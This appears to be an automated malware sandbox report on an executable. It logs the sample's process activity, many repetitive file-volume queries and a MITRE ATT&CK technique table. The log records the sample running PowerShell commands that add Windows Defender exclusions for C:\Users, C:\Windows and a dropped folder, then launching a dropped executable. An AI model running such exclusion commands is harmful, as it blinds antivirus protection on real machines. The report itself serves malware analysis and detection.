Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'"Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe "C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\spxzLeEJsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\UsersJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\WindowsJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeQueries volume information: C:\Users\user\Desktop\YYjRtxS70h.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00431442 GetUserNameA,15_2_00431442
Source: C:\Users\user\Desktop\YYjRtxS70h.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
11
Process Injection
1
Masquerading
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
21
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
11
Disable or Modify Tools
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information
LSA Secrets1
Account Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing
Cached Domain Credentials1
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp
DCSync2
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
